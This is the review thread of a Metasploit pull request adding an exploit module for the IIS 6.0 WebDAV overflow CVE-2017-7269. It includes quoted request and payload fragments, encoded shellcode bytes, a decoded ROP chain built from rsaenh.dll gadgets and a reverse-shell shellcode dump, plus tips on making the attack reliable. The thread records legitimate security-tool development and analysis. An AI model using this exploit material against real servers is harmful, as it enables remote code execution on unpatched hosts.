Create cve-2017-7269.rb
rapid7/metasploit-framework pull request #8162
Opened 2017-03-28 14:38 UTC by dmchell

Exploit for cve-2017-7269.rb

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not

2017-03-28 14:57 UTC, zeroSteiner requested changes

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_ScStoragePathFromUrl.rb
> +          'PrependMigrateProc' => "calc"
Is this actually necessary to specify?

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_ScStoragePathFromUrl.rb
> +          [ 'CVE', 'CVE-2017-7269'],
`[ 'CVE', '2017-7269' ],` (you don't need the "CVE-" in the second part.

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_ScStoragePathFromUrl.rb
> +      'Author'         => [ 'Dominic Chell <dominic@mdsec.co.uk>' ],
In cases where there is an "Original Author" they generally each get their own lines within the module. You can then specify who did what by using comments like:
```
'Zhiniang Peng',  # original exploit
'Dominic Chell <dominic@mdsec.co.uk>' # metasploit module
```

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_ScStoragePathFromUrl.rb
> +    sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")
This should really use the HTTP mixin.

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +    buf1 << "\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\x
These should be broken out so we know what these binary blobs are. I'm assuming their the original exploit's ROP chains, and in that case documenting the gadgets in comments would be really helpful.

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +          'PrependMigrateProc' => "calc"
Is this really necessary to specify?

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +      'Author'         => [ 'Dominic Chell <dominic@mdsec.co.uk>' ],
Generally when there's an original exploit, those others get credit within the module as well. The normal convention is to then specify each author's roles with comments next to their name.

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +    sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")
This should really use the HTTP mixin to make the request.

2017-03-28 14:57 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +    buf1 = "If: <http://localhost/aaaaaaa"
Can these references to `http://localhost/...` be randomized? Same with the bbbb one below.

2017-03-28 15:00 UTC, zeroSteiner commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +    sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")
I should have referenced the [How to Send an HTTP Request](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient) wiki page.

2017-03-28 15:04 UTC, vysec commented on modules/exploits/windows/iis/iis_webdav_ScStoragePathFromUrl.rb
> +      'Author'         => [ 'Dominic Chell <dominic@mdsec.co.uk>' ],
Pretty sure it's Zhiniang Peng and Chen Wu, don't forget Mr. Wu

2017-03-28 15:13 UTC, thecarterb commented
@dmchell @zeroSteiner I will be making a PR with a few stylistic changes and improvements

2017-03-28 15:19 UTC, jamcut commented
This did get me a shell, for what its worth...

![cve-2017-7269](https://cloud.githubusercontent.com/assets/3229709/24413065/553d9f74-13a8-11e7-9c1d-dec5d8a77d60.png)

2017-03-28 15:20 UTC, thecarterb commented
@jamcut It got me a shell as well; however, the module could use some stylistic and functional improvements (which I am working on now).

2017-03-28 15:26 UTC, jamcut commented
@thecarterb I won't argue that, just commenting on raw usefulness.

2017-03-28 15:29 UTC, egypt commented on modules/exploits/windows/iis/iis_webdav_ScStoragePathFromUrl.rb
> +    sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")
That might require some testing. Does adding random headers break the determinism of the victim state, for example?

2017-03-28 16:21 UTC, dmchell commented
If you're making stylistic changes then you should grab the latest version as I updated it to use Msf::Exploit::Remote::HttpClient as per the feedback

2017-03-28 17:01 UTC, thecarterb commented
@dmchell Just made the PR on your `dmchell-cve-2017-7269` branch

2017-03-28 17:19 UTC, dmchell commented
@thecarterb have you tested it? the PR fails to shell.

2017-03-28 17:30 UTC, egypt commented
Are older versions vulnerable? Doesn't work for me against SP1

2017-03-28 17:33 UTC, dmchell commented
@egypt only tested on SP2 but I'll snapshot and rm the SP and try it

2017-03-28 17:36 UTC, wwebb-r7 commented
I'd caution everyone to avoid potentially gilding the lily and focus on the basics.  The biggest hurdle you have from @zeroSteiner 's requests is documenting the ROP chain gadget by gadget.  It's undoubtedly going to fail against some far flung release five years from now and someone's going to have to debug it.

2017-03-28 17:39 UTC, dmchell commented
@wwebb-r7 absolutely, I put it to the bottom of the list as it was the most time consuming of the review comments, but it's on the TODO rest assured

2017-03-28 18:16 UTC, dmchell commented
Tested on SP1, no crash.

2017-03-29 05:16 UTC, void-in commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +      'vhost' => 'localhost',
Why these two (agent and vhost) needs to be explicitly declared? Also if vhost is hard-coded to localhost, won't this create problems when run against an actual virtual host?

2017-03-29 07:18 UTC, FireFart commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +    res = send_request_cgi({ 'uri' => '/' })
This should be an OPTIONS request checking the response headers for WebDAV related stuff like
```
MS-Author-Via: DAV
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
```

2017-03-29 07:22 UTC, FireFart commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +    buf1 = "<http://localhost/aaaaaaa"
can we replace all `localhost` with the actual VHOST value?

2017-03-29 07:54 UTC, dmchell commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +      'vhost' => 'localhost',
As far as I can tell, the localhost is required to trigger the bug or at least that's what my testing has shown.

2017-03-29 07:55 UTC, dmchell commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +    buf1 = "<http://localhost/aaaaaaa"
As above - this seems to be required to trigger the bug. Still reversing it and will update if I find otherwise

2017-03-29 07:56 UTC, dmchell commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +    res = send_request_cgi({ 'uri' => '/' })
Agreed

2017-03-29 08:54 UTC, FireFart commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +      'uri' => '/'
this should be `target_uri` for setups with reverse proxies based on paths in front of the server

2017-03-29 09:29 UTC, nixawk commented
Good job.  Let's test it.

2017-03-29 20:48 UTC, espreto commented
Small fixes, but still unstable. With SP1 it did not work.
https://gist.github.com/espreto/5ac4d123a227d018f6979bb4f7e43a25

I'll send the improvements soon.

2017-03-30 09:15 UTC, PaulSec commented
Works fine on Build 3790, Service Pack 2. Thanks @dmchell

2017-03-30 09:17 UTC, FireFart commented
I noticed that when you run the exploit with `exploit -j -z` there are multiple connections coming in and many of them are not working. Running it with `exploit` solves this issue

2017-03-30 09:53 UTC, KitsuneDev approved these changes

2017-03-30 21:52 UTC, kamalmjt approved these changes

2017-03-30 22:31 UTC, zcgonvh commented
fix not work when length of physical path not equal to 19,or has a host binding.
https://github.com/zcgonvh/cve-2017-7269/blob/master/cve-2017-7269.rb
gist was blocked by G_F_W,i can use repository only.

2017-03-31 07:55 UTC, dmchell commented
@zcgonvh which fix? the 0patch one?

2017-03-31 10:53 UTC, willemwesterhof commented
Just tested the code.
Works* on R2 SP2.
Does not currently work on R2 SP1. 
Does not currently work on R1 SP1.

*had one encounter where meterpreter was exitted and I was unable to exploit afterwards. Could not reproduce this though.

2017-03-31 14:15 UTC, zcgonvh commented
@dmchell bugs,old module can only work on **Default WebSite**.
(sorry,my english is poor,see code and screenshots.)
1.like `Host` header,`HOST:PORT` binding on `If` header is required.
for example,if target is `hxxp://test.local:8088`,the `If` header MUST be like this:

> If: <http://test.local:8088/aaaaaaa_some_padding_and_stack_pivot> (Not <locktoken:write1>) <http://test.local:8088/bbbbbbb_padding_ROP_and_shellcode

if not,a 502 error will returned.

![1](https://cloud.githubusercontent.com/assets/25787677/24550956/14a08604-1653-11e7-800d-62528c3035c6.png)

new module fix it using `HttpHost` option.
`set HttpHost test.local`

2. `If` header contains two urls,and map to phyiscal path(same as `Server.MapPath`) when internal process.
on **Default WebSite**,the 1st url (hxxp://test.local:8088/aaaa) will map to:

> c:\inetpub\wwwroot\hocxaw3q6irG9zwKpOSuOzhHcVTmEhS9lPgUcgd30FExRi1TXLQjAr1B5pPXd6Gl95jT4PCTRwaP22Km4lG2AbM7aQbXsGPRp6Dujht3JNkxvIsNjLzWqoJX02n7IKMRcHLoVuuuofhvMDpP6zKbWePurjkzbwXvHb1eT0ylJPbT3Pw5wjDA43vdFMTVlGCe2vxriW8Crb0Z8YHT?hDlVR7KmlXOZXPyjIOXRJPAMf?h4H1eCofnAtlC?hCSAjRp03fXLBKpFcsQAyPzlJ
     
![5](https://cloud.githubusercontent.com/assets/25787677/24553059/7429d67c-165b-11e7-84b8-8bb0ee97b4b2.png)

this buffer overriten `vtable` for `IEcb` object, and exploit works.
btw.if length of root directory **not equals to 19**, wrong data will be written,exploit may fail.

on new module,use `PhysicalPathLength` option to fix padding.for example,if root directory was `c:\inetpub\`,the `PhysicalPathLength` MUST be set to `11`.
`set PhysicalPathLength 11`

new module fix this,and tests pass. some outputs [here](https://github.com/zcgonvh/cve-2017-7269/blob/master/README.md).

you can make this environment for testing:
> create a new website
> set tcp port to 8088
> add a host binding like test.local
> set root directory to c:\inetpub
> run old,and run new

2017-04-01 19:24 UTC, rwhitcroft commented
Can confirm @zcgonvh is correct - the addition of HttpHost and PhysicalPathLength make this exploit more reliable. Unless there's an accompanying physical path disclosure vuln on the target, you'll have to guess at the PhysicalPathLength value - just start at 10 (arbitrary) and increment the value between runs.

2017-04-02 03:31 UTC, hacking-team commented
iis6.0 is out

2017-04-03 16:19 UTC, FireFart commented
@dmchell @zcgonvh I modifed your exploit a little to make it more usable, will send a PR in a few minutes

2017-04-03 18:10 UTC, FireFart commented
@dmchell I sent you a Pull request with some advanced options
https://github.com/dmchell/metasploit-framework/pull/3

I tested the exploit agains some real IIS 2k3 behind some proxy servers and it works correctly.

@zcgonvh @willemwesterhof @PaulSec @espreto would be great if you can test the new version again

2017-04-07 19:12 UTC, egypt commented
Would it be possible to brute force the PhysicalPathLength rather than having a user guess it?

2017-04-07 19:19 UTC, FireFart commented
@egypt I don't think so. the server name, port and length all have to be correct for the exploit to work, otherwise a 502 is returned. localhost worked in none of my cases :( my tested systems all were behind reverse proxies so I had to know the real server name and port first :/

2017-04-08 01:10 UTC, rwhitcroft commented
@egypt brute forcing the physical path length seems like a requirement since there's no way you'd be able to guess it. In my testing there's no harm in starting at 6 and going up to 40 (or whatever) - it'll work eventually if the server name is right.

2017-04-10 16:46 UTC, rwhitcroft commented
@FireFart did you test your PR? There's no `handler`...?

2017-04-10 16:59 UTC, wvu-r7 commented
@rwhitcroft: Why do you need to call `handler` explicitly?

2017-04-10 17:00 UTC, wvu-r7 commented
@rwhitcroft: Why do you need to explicitly call `handler` for this module?

2017-04-10 21:22 UTC, rwhitcroft commented
PR coming your way @dmchell

2017-04-10 22:39 UTC, rwhitcroft commented
PR coming your way @dmchell

2017-04-11 04:53 UTC, FireFart commented
@rwhitcroft why are you removing all progress on this module in your PR?

2017-04-11 05:03 UTC, rwhitcroft commented
How is this not an improvement? What progress did I remove? You seem upset, but I'm not sure why.

2017-04-11 05:05 UTC, FireFart commented
@rwhitcroft you removed all added options which are essential for this module to work. You also removed the metasploit stub in the beginning, changed references and so on.

2017-04-11 05:14 UTC, rwhitcroft commented
You're right about the stub, not sure what happened there.

You're wrong about the rest though. The PR requires only that you know the VHOST, so it's actually fewer options. Not sure how this is bad thing. Would you rather have to guess?

2017-04-11 05:23 UTC, FireFart commented
@rwhitcroft:
`TARGETURI` is necessary if you need to set a sub path, `ServerName` and `ServerPort` are necessary if you are behind a reverse proxy as these values can be different from RHOST and RPORT.
You should not remove them, instead implement a `get_sane_defaults` and set them if the user has not set them explicitly.

2017-04-11 05:26 UTC, rwhitcroft commented
Fair enough! PR closed.

2017-04-11 18:57 UTC, rwhitcroft commented
@FireFart Trying again - can you take a look? https://github.com/dmchell/metasploit-framework/pull/6

It doesn't work without setting VHOST, even if ServerName is correct. I took out the physical path length because you shouldn't need it anymore with the brute force.

2017-04-17 16:57 UTC, busterb reviewed
As mentioned earlier, the ROP chain still needs to be reverse-engineered here. We should have some documentation for how to do this coming up.

2017-04-17 16:57 UTC, busterb commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +          'EncoderType'   => Msf::Encoder::Type::AlphanumUnicodeMixed,
Do we really need to force the EncoderType here? (side note - it would be good to be able to specify a preference array here)

2017-04-17 16:57 UTC, busterb commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +            {
It would be nice to add Arch in addition here.

2017-04-17 16:57 UTC, busterb commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +        OptString.new('ServerName', [ true, 'Servername of the Backend Server', 'localhost' ]),
Can this be converted to VHOST / RPORT instead?

2017-04-17 16:57 UTC, busterb commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +      return Exploit::CheckCode::Vulnerable
Should this return Appears instead of Vulnerable since it's just checking version instead of exercising the vulnerability?

2017-04-17 18:04 UTC, FireFart commented on modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb
> +        OptString.new('ServerName', [ true, 'Servername of the Backend Server', 'localhost' ]),
@busterb actually not. This has to be the server name of the backend server. In a reverse proxy Setup this does not match the vhost. I think the best would be to make this option optional and implement a method to determine the name. If it's not set use vhost, otherwise use the variable. The same goes for Serverport.

2017-04-24 21:15 UTC, egypt commented
I think the thing that's really holding this back is that we have no idea what that big blob of unicode is.  

@zcgonvh Do you have documentation for it?

2017-04-24 21:40 UTC, FireFart commented
@egypt the only analysis I found so far:
http://blog.nsfocus.net/microsoft-windows-server-2003-r2-iis-6-0-remote-code-execution-technical-analysis-solution/
https://0patch.blogspot.co.at/2017/03/0patching-immortal-cve-2017-7269.html

I think someone needs to start reversing the exploit so we can create proper shellcode

2017-04-24 22:49 UTC, busterb commented
I used printf on the shellcode and piped through iconv from UTF-8 to UTF-16LE, and it produces plausible shellcode.

```
$ printf "\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81" > chars2.txt

$ iconv -f UTF-8 -t UTF-16LE chars2.txt > code2.txt
```

2017-04-24 23:50 UTC, busterb commented
The shorter code courtesy of @sinn3r 
```
0040AEC1     77 6A          JA SHORT iexplore.0040AF2D
0040AEC3     44             INC ESP
0040AEC4     41             INC ECX
0040AEC5     34 33          XOR AL,33
0040AEC7     76 64          JBE SHORT iexplore.0040AF2D
0040AEC9     46             INC ESI
0040AECA     4D             DEC EBP
0040AECB     54             PUSH ESP
0040AECC     56             PUSH ESI
0040AECD     6C             INS BYTE PTR ES:[EDI],DX                                  ;  I/O command
0040AECE     47             INC EDI
0040AECF     43             INC EBX
0040AED0     65:3276 78     XOR DH,BYTE PTR GS:[ESI+78]
0040AED4     72 69          JB SHORT iexplore.0040AF3F
0040AED6     57             PUSH EDI
0040AED7     3843 72        CMP BYTE PTR DS:[EBX+72],AL
0040AEDA     6230           BOUND ESI,QWORD PTR DS:[EAX]
0040AEDC     5A             POP EDX
0040AEDD     3859 48        CMP BYTE PTR DS:[ECX+48],BL
0040AEE0     54             PUSH ESP
0040AEE1     0202           ADD AL,BYTE PTR DS:[EDX]
0040AEE3     0202           ADD AL,BYTE PTR DS:[EDX]
0040AEE5     C012 03        RCL BYTE PTR DS:[EDX],3
0040AEE8     68 446C5652    PUSH 52566C44
0040AEED     37             AAA
0040AEEE     4B             DEC EBX
0040AEEF     6D             INS DWORD PTR ES:[EDI],DX                                 ;  I/O command
0040AEF0     6C             INS BYTE PTR ES:[EDI],DX                                  ;  I/O command
0040AEF1     58             POP EAX
0040AEF2     4F             DEC EDI
0040AEF3     5A             POP EDX
0040AEF4     58             POP EAX
0040AEF5     50             PUSH EAX
0040AEF6     79 6A          JNS SHORT iexplore.0040AF62
0040AEF8     49             DEC ECX
0040AEF9     4F             DEC EDI
0040AEFA     58             POP EAX
0040AEFB     52             PUSH EDX
0040AEFC     4A             DEC EDX
0040AEFD     50             PUSH EAX
0040AEFE     41             INC ECX
0040AEFF     4D             DEC EBP
0040AF00     66:C013 03     RCL BYTE PTR DS:[EBX],3
0040AF04     68 34483165    PUSH 65314834
0040AF09     43             INC EBX
0040AF0A     6F             OUTS DX,DWORD PTR ES:[EDI]                                ;  I/O command
0040AF0B     66:6E          OUTS DX,BYTE PTR ES:[EDI]                                 ;  I/O command
0040AF0D     41             INC ECX
0040AF0E     74 6C          JE SHORT iexplore.0040AF7C
0040AF10     43             INC EBX
0040AF11     C013 03        RCL BYTE PTR DS:[EBX],3
0040AF14     68 4353416A    PUSH 6A415343
0040AF19     52             PUSH EDX
0040AF1A     70 30          JO SHORT iexplore.0040AF4C
0040AF1C     3366 58        XOR ESP,DWORD PTR DS:[ESI+58]
0040AF1F     4C             DEC ESP
0040AF20     42             INC EDX
0040AF21     4B             DEC EBX
0040AF22     70 46          JO SHORT iexplore.0040AF6A
0040AF24     6373 51        ARPL WORD PTR DS:[EBX+51],SI
0040AF27     41             INC ECX
0040AF28     79 50          JNS SHORT iexplore.0040AF7A
0040AF2A     7A 6C          JPE SHORT iexplore.0040AF98
0040AF2C     4A             DEC EDX
```

2017-04-24 23:51 UTC, busterb commented
The longer one (this might be alpha2 encoded):
```
0040AEBA     56             PUSH ESI
0040AEBB     5A             POP EDX
0040AEBC     41             INC ECX
0040AEBD     6272 6E        BOUND ESI,QWORD PTR DS:[EDX+6E]
0040AEC0     3166 59        XOR DWORD PTR DS:[ESI+59],ESP
0040AEC3     59             POP ECX
0040AEC4     335442 31      XOR EDX,DWORD PTR DS:[EDX+EAX*2+31]
0040AEC8     65:58          POP EAX                                                   ;  Superfluous prefix
0040AECA     41             INC ECX
0040AECB     59             POP ECX
0040AECC     50             PUSH EAX
0040AECD     71 36          JNO SHORT iexplore.0040AF05
0040AECF     3077 57        XOR BYTE PTR DS:[EDI+57],DH
0040AED2     57             PUSH EDI
0040AED3     44             INC ESP
0040AED4     61             POPAD
0040AED5     53             PUSH EBX
0040AED6     C013 03        RCL BYTE PTR DS:[EBX],3
0040AED9     68 4F6E0068    PUSH 68006E4F
0040AEDE     4F             DEC EDI
0040AEDF     6E             OUTS DX,BYTE PTR ES:[EDI]                                 ;  I/O command
0040AEE0     0068 47        ADD BYTE PTR DS:[EAX+47],CH
0040AEE3     42             INC EDX
0040AEE4     6A 76          PUSH 76
0040AEE6     C013 03        RCL BYTE PTR DS:[EBX],3
0040AEE9     68 5742744F    PUSH 4F744257
0040AEEE     47             INC EDI
0040AEEF     59             POP ECX
0040AEF0     34 52          XOR AL,52
0040AEF2     66:4B          DEC BX
0040AEF4     42             INC EDX
0040AEF5     4B             DEC EBX
0040AEF6     64:74 6F       JE SHORT iexplore.0040AF68                                ;  Superfluous prefix
0040AEF9    ^78 82          JS SHORT iexplore.0040AE7D
0040AEFB     60             PUSHAD
0040AEFC     0168 35        ADD DWORD PTR DS:[EAX+35],EBP
0040AEFF     51             PUSH ECX
0040AF00     7A 72          JPE SHORT iexplore.0040AF74
0040AF02     7A 74          JPE SHORT iexplore.0040AF78
0040AF04     47             INC EDI
0040AF05     4D             DEC EBP
0040AF06     59             POP ECX
0040AF07     44             INC ESP
0040AF08     57             PUSH EDI
0040AF09     57             PUSH EDI
0040AF0A     13B1 00687631  ADC ESI,DWORD PTR DS:[ECX+31766800]
0040AF10     6F             OUTS DX,DWORD PTR ES:[EDI]                                ;  I/O command
0040AF11     6E             OUTS DX,BYTE PTR ES:[EDI]                                 ;  I/O command
0040AF12     E3 24          JECXZ SHORT iexplore.0040AF38
0040AF14     0168 60        ADD DWORD PTR DS:[EAX+60],EBP
0040AF17     14 03          ADC AL,3
0040AF19     68 0003FE7F    PUSH 7FFE0300
0040AF1E     FFFF           ???                                                       ;  Unknown command
0040AF20     FFFF           ???                                                       ;  Unknown command
0040AF22     C013 03        RCL BYTE PTR DS:[EBX],3
0040AF25     68 6E040368    PUSH 6803046E
0040AF2A     6E             OUTS DX,BYTE PTR ES:[EDI]                                 ;  I/O command
0040AF2B     71 70          JNO SHORT iexplore.0040AF9D
0040AF2D     74 34          JE SHORT iexplore.0040AF63
0040AF2F     14 03          ADC AL,3
0040AF31     68 E7290168    PUSH 680129E7
0040AF36     91             XCHG EAX,ECX
0040AF37     93             XCHG EAX,EBX
0040AF38     0068 31        ADD BYTE PTR DS:[EAX+31],CH
0040AF3B     396E 66        CMP DWORD PTR DS:[ESI+66],EBP
0040AF3E     55             PUSH EBP
0040AF3F     49             DEC ECX
0040AF40     52             PUSH EDX
0040AF41     306B 54        XOR BYTE PTR DS:[EBX+54],CH
0040AF44     6B76 4A 72     IMUL ESI,DWORD PTR DS:[ESI+4A],72
0040AF48     61             POPAD
0040AF49     79 1C          JNS SHORT iexplore.0040AF67
0040AF4B     14 03          ADC AL,3
0040AF4D     68 056E0068    PUSH 68006E05
0040AF52     3277 68        XOR DH,BYTE PTR DS:[EDI+68]
0040AF55     79 69          JNS SHORT iexplore.0040AFC0
0040AF57     4D             DEC EBP
0040AF58     6C             INS BYTE PTR ES:[EDI],DX                                  ;  I/O command
0040AF59     36:68 44704D46 PUSH 464D7044                                             ;  Superfluous prefix
0040AF5F     8200 68        ADD BYTE PTR DS:[EAX],68
0040AF62     77 48          JA SHORT iexplore.0040AFAC
0040AF64     53             PUSH EBX
0040AF65     32AA 1D02686A  XOR CH,BYTE PTR DS:[EDX+6A68021D]
0040AF6B     6F             OUTS DX,DWORD PTR ES:[EDI]                                ;  I/O command
0040AF6C     35 43F81303    XOR EAX,313F843
0040AF71     68 E7290168    PUSH 680129E7
```

2017-04-25 14:07 UTC, zcgonvh commented
@egypt 
its UTF-8 string and will be convert to UTF16-LE. 
decoded 1st url (hxxp://test.local:8088/aaaa) contains some paddings(0xc0 bytes? on decoded) and a hard-coded address `0x680312c0` .
decoded 2st url (hxxp://test.local:8088/bbbb) contains paddings(0xb0 bytes? on decoded) ,a fake `vtable` union from a fake object(with hard-coded address `0x680313c0`), and rops,.
on processing,the first `memcpy` copy 1st url to stack,over written the buffer pointer for 2st url to `0x680312c0`;next `memcpy` copy 2st url to buffer,over written ~~`vtable` for `IEcb` object~~ `IEcb` object pointer to a fake object `0x680313c0` ;finally,`httpext!ScStripAndCheckHttpPrefix+0x1e` call function on fake object,and rops run.

2017-04-25 17:50 UTC, rwhitcroft commented
These look like ROP chains, not raw instructions. Looking at the bottom few lines in @busterb's post directly above, you can see ROP gadgets that reside in rsaenh.dll:

```
0:019> lm m rsaenh
start    end        module name
68000000 68035000   rsaenh     (pdb symbols)          c:\symbols\rsaenh.pdb\1424801011134E3DADD4748A436CFE1C1\rsaenh.pdb
```

For instance:
```
0040AF71     68 E7290168    PUSH 680129E7
```
If this is treated as a gadget instead of a PUSH, it makes a bit more sense:
```
0:019> u 680129E7
rsaenh!HmacCheck+0x7c7:
680129e7 c9              leave
680129e8 c3              ret
```

Another one:
```
0040AF65     32AA 1D02686A  XOR CH,BYTE PTR DS:[EDX+6A68021D]
```
is probably actually:
```
0:019> u 68021daa
rsaenh!IsForceHighProtectionEnabled+0x8:
68021daa 8b8010010000    mov     eax,dword ptr [eax+110h]
68021db0 5d              pop     ebp
68021db1 c20400          ret     4
```
etc...

2017-04-26 13:19 UTC, egypt commented
@busterb The I/O instructions (`OUT`, `OUTS`, `IN`, `INS`) pretty much always mean that what you have is either not shellcode or decoded incorrectly.

@zcgonvh Thanks for the clarification!

2017-04-26 13:21 UTC, busterb commented
Sometimes Cunningham's law is the best approach.

2017-05-03 18:37 UTC, rwhitcroft commented
Here's a bit more. I'm definitely not an expert so some of this is probably wrong...

Start with this breakpoint, and run the exploit:
`ba r4 680313c0`

Hitting `g` 10 times, should land you at the start of the ROP chain:

```
68006e4f # POP ESI # POP EBP # RETN 20
68006e4f # POP ESI # POP EBP # RETN 20
6800b113 # PUSH 40h # JMP 6800b125 (40h == PAGE_EXECUTE_READWRITE)
6800b125 # POP EAX # POP EBP # RETN 4
680129e7 # LEAVE # RETN
68006e05 # LEA ESP,[EBP-20h] # POP EDI # POP ESI # POP EBX # LEAVE # RETN 24
68009391 # POP EAX # POP EBP # RETN 4
68021daa # MOV EAX,DWORD PTR [EAX+110h] # POP EBP # RETN 4
680129e7 # LEAVE # RETN
680124e3 # JMP DWORD PTR [EBX] (EBX -> SharedUserData!SystemCallStub)
7c8285e8 # MOV EDX,ESP # SYSENTER # RETN
```

Gadget `68021daa` puts `0x8f` into `EAX`, which is the syscall number for `NtProtectVirtualMemory`:
```
0:009> dd eax+110 L1
68008356  0000008f
```

After `SYSENTER`, the page is executable:
```
[+] Information about address 0x68031404
    ascii {PAGE_EXECUTE_READWRITE}
```

And the final shellcode (rev tcp) here:
```
rsaenh!g_pfnFree+0x1a4:
68031460 56              push    esi
0:009> du esi
68031460  "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA"
680314a0  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ"
680314e0  "1AIAIAJ11AIAIABABABQI1AIQIAIQI11"
68031520  "1AIAJQYAZBABABABABkMAGB9u4JBiliY"
68031560  "QzYpKPkPQMsS5uLKra94Pp9nKOYoTMR4"
680315a0  "O4c0ob38X1mzRKvQkOIEBma4LdqPxkS0"
680315e0  "1N2mCHc0Og0PNQIKqCr3OxJdKPipZhR3"
68031620  "PSnsNvPSoxt9FloO3VkOZ5CUGPBTr90j"
68031660  "mpE0y7jpr30S01iKPSionWaXtnTGf2OO"
680316a0  "yoVu0T0hpMkQIp9pJKp9pPiop71XI5Fx"
680316e0  "wMjGioXU0S23ns2kPLo4kL0QB323Io07"
68031720  "aX7V6L3j49YohUaZyoaXmtzPnU9PioHU"
```

I'm not sure about the final jump into the shellcode though.

2017-05-03 19:19 UTC, wwebb-r7 commented
@rwhitcroft given that the shellcode is going to be stored as unicode, it stands to reason that it's encoded with something like [this](https://github.com/SkyLined/alpha3).  I don't have time to test at the moment, but I will later on unless you get to it first.

2017-05-08 19:47 UTC, wchen-r7 commented
@FireFart and I took a look at this PR and we suggest:

1. The user doesn't need to set the ServerName option. The exploit should automatically send a PROFIND request (with content-legnth as 0), the XML in the response contains the server name and port, and the module can use those automatically.

2. Let's merge the PR that can brute-force the PhysicalPathLength.

2017-05-08 20:12 UTC, FireFart commented
I'm currently implementing the changes

2017-05-08 20:53 UTC, FireFart commented
